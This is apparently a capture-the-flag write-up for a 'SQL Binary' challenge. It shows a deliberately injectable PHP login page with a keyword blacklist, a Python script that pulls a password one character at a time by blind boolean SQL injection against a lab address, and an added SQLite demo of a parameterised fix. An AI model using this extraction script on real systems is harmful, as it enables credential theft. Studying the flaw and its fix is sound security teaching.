1.
<html>
<head>
<title>SQL Binary</title>
</head>
<body>
<?php
@mysql_connect("localhost","","");
@mysql_select_db("");
/*
mysql> desc mem;
+-------+-------------+------+-----+---------+-------+
| Field | Type        | Null | Key | Default | Extra |
+-------+-------------+------+-----+---------+-------+
| no    | int(50)     | YES  |     | NULL    |       |
| id    | varchar(50) | YES  |     | NULL    |       |
| pw    | varchar(50) | YES  |     | NULL    |       |
+-------+-------------+------+-----+---------+-------+
3 rows in set (0.00 sec)
*/
if($_GET[no])
{
if(eregi("from|union|ascii|char|0x",$_GET[no])) exit("Access Denied");
$q=@mysql_fetch_array(mysql_query("select * from mem where no=$_GET[no]"));
if($q)
{
echo("no : $q[no]<br>id : $q[id]<br>pw : ?");
exit();
}
}
echo("<form method=get action=index.php>user_no<br><input type=text name=no value=1><br><br><input type=submit></form>");
?>
<br>
<a href=index.phps>index.phps</a>
</body>
</html>
A script that uses SQL injection to guess the password through the web page ↓
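import requests

# Marker that appears only when the injected condition is true:
# index.php prints "pw : ?" when the query returns a row.
search = '?'

# Candidate character codes 0..129 to test at each position.
lower = list(range(0, 130))

# Test positions 1..7 of the pw column, one character code at a time.
for i in range(1, 8):
    for l in lower:
        URL = "http://192.168.101.201/challenges/sql_binary/index.php?no=2 and ord(substr(pw," + str(i) + ",1))=" + str(l) + "%23"
        res = requests.get(URL)
        if search in res.text:
            m = chr(l)
            print(i, m, l)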
Code explanation
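Why the keyword blacklist in index.php does not stop the boolean condition used above, and what does stop it, shown as an added example that is not part of the original post. It assumes SQLite in place of the challenge's MySQL server (with a registered ord() stand-in), constructed table rows, and hypothetical function names.

```python
import re
import sqlite3

def make_db():
    """In-memory stand-in for the mem table; rows and passwords are constructed."""
    db = sqlite3.connect(":memory:")
    # SQLite has no ORD(); register a stand-in for the MySQL function.
    db.create_function("ord", 1, lambda s: ord(s[0]) if s else 0)
    db.execute("create table mem (no integer, id text, pw text)")
    db.executemany("insert into mem values (?,?,?)",
                   [(1, "guest", "guest"), (2, "admin", "s3cret!")])
    return db

# Same keyword list as the eregi() call in index.php (case-insensitive).
BLACKLIST = re.compile(r"from|union|ascii|char|0x", re.IGNORECASE)

def lookup_vulnerable(db, no):
    """Mirrors index.php: blacklist check, then string concatenation."""
    if BLACKLIST.search(no):
        return "Access Denied"
    row = db.execute("select * from mem where no=" + no).fetchone()
    return f"no : {row[0]}<br>id : {row[1]}<br>pw : ?" if row else ""

def lookup_hardened(db, no):
    """Allow-list the input as a short decimal integer and bind it as a parameter.
    Only the columns the page displays are selected, so pw never leaves the DB."""
    if not re.fullmatch(r"[0-9]{1,9}", no):
        return "Access Denied"
    row = db.execute("select no, id from mem where no = ?", (int(no),)).fetchone()
    return f"no : {row[0]}<br>id : {row[1]}<br>pw : ?" if row else ""

def oracle_leaks(lookup, db):
    """True if a true and a false condition on pw produce different pages."""
    true_cond = "2 and ord(substr(pw,1,1))=115"   # 115 = 's', first byte of the constructed pw
    false_cond = "2 and ord(substr(pw,1,1))=0"
    return lookup(db, true_cond) != lookup(db, false_cond)

if __name__ == "__main__":
    db = make_db()
    print("vulnerable handler leaks:", oracle_leaks(lookup_vulnerable, db))
    print("hardened handler leaks:  ", oracle_leaks(lookup_hardened, db))
```

The blacklist only names a few keywords, so `ord` and `substr` pass through and the page's presence or absence of a result row becomes a one-bit answer about `pw`; type validation plus a bound parameter removes that channel regardless of which keywords are used.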
2.